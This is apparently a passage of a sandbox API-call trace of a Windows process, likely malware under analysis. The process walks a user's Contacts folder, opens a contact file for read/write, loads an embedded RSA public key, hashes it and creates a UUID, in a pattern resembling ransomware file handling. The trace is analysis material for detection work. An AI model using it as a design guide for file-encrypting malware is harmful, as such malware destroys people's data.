1 [0097.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.327] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.327] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0097.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.327] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.327] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.327] PathFindFileNameW (pszPath="") returned="" [0097.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.328] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.328] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0097.328] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0097.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.329] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=1178) returned 1 [0097.329] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.333] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.333] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.335] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x49a, lpOverlapped=0x0) returned 1 [0097.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d0958 [0097.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.335] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.335] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.336] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.336] CryptHashData (hHash=0x3331b88, pbData=0x32d0958, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.336] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32f7268 [0097.337] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x32f7268, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32f7268, pdwDataLen=0x9e2fa54) returned 1 [0097.337] GetLastError () returned 0x0 [0097.337] SetLastError (dwErrCode=0x0) [0097.337] GetLastError () returned 0x0 [0097.337] SetLastError (dwErrCode=0x0) [0097.337] GetLastError () returned 0x0 [0097.337] SetLastError (dwErrCode=0x0) [0097.337] GetLastError () returned 0x0 [0097.337] SetLastError (dwErrCode=0x0) [0097.337] GetLastError () returned 0x0 [0097.337] SetLastError (dwErrCode=0x0) [0097.337] GetLastError () returned 0x0 [0097.337] SetLastError (dwErrCode=0x0) [0097.337] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.338] SetLastError (dwErrCode=0x0) [0097.338] GetLastError () returned 0x0 [0097.339] SetLastError (dwErrCode=0x0) [0097.339] GetLastError () returned 0x0 [0097.339] SetLastError (dwErrCode=0x0) [0097.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.339] GetLastError () returned 0x0 [0097.339] SetLastError (dwErrCode=0x0) [0097.339] GetLastError () returned 0x0 [0097.339] SetLastError (dwErrCode=0x0) [0097.339] GetLastError () returned 0x0 [0097.339] SetLastError (dwErrCode=0x0) [0097.339] GetLastError () returned 0x0 [0097.339] SetLastError (dwErrCode=0x0) [0097.339] GetLastError () returned 0x0 [0097.340] SetLastError (dwErrCode=0x0) [0097.340] GetLastError () returned 0x0 [0097.340] SetLastError (dwErrCode=0x0) [0097.340] GetLastError () returned 0x0 [0097.340] SetLastError (dwErrCode=0x0) [0097.340] GetLastError () returned 0x0 [0097.340] SetLastError (dwErrCode=0x0) [0097.340] GetLastError () returned 0x0 [0097.340] SetLastError (dwErrCode=0x0) [0097.340] GetLastError () returned 0x0 [0097.340] SetLastError (dwErrCode=0x0) [0097.340] GetLastError () returned 0x0 [0097.340] SetLastError (dwErrCode=0x0) [0097.340] GetLastError () returned 0x0 [0097.341] SetLastError (dwErrCode=0x0) [0097.341] GetLastError () returned 0x0 [0097.341] SetLastError (dwErrCode=0x0) [0097.341] GetLastError () returned 0x0 [0097.341] SetLastError (dwErrCode=0x0) [0097.341] GetLastError () returned 0x0 [0097.341] SetLastError (dwErrCode=0x0) [0097.341] GetLastError () returned 0x0 [0097.341] SetLastError (dwErrCode=0x0) [0097.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7268 | out: hHeap=0x630000) returned 1 [0097.341] CryptDestroyHash (hHash=0x3331b88) returned 1 [0097.341] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.341] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.341] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.341] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4a0) returned 0x333a888 [0097.342] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d0958 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a4c0 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a4a8 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a298 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.342] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a298 | out: hHeap=0x630000) returned 1 [0097.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a580 | out: hHeap=0x630000) returned 1 [0097.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a550 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32f71e8 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a298 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x32b75c0 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7268 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7208 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a298 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f71e8 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a580 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.343] GetCurrentThreadId () returned 0x42c [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6957f8 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316f78 [0097.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.344] GetCurrentThreadId () returned 0x42c [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33186b8 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a580 [0097.344] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a298 [0097.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecd0 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecf0 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x630000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f71e8 [0097.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecd0 | out: hHeap=0x630000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a328 [0097.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a490 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5c8 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cece0 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7248 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32f71c8 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a298 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a298 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a580 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f71c8 | out: hHeap=0x630000) returned 1 [0097.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x32b75c0 [0097.346] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a298 | out: hHeap=0x630000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7248 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f71e8 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a550 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a328 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0097.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.348] 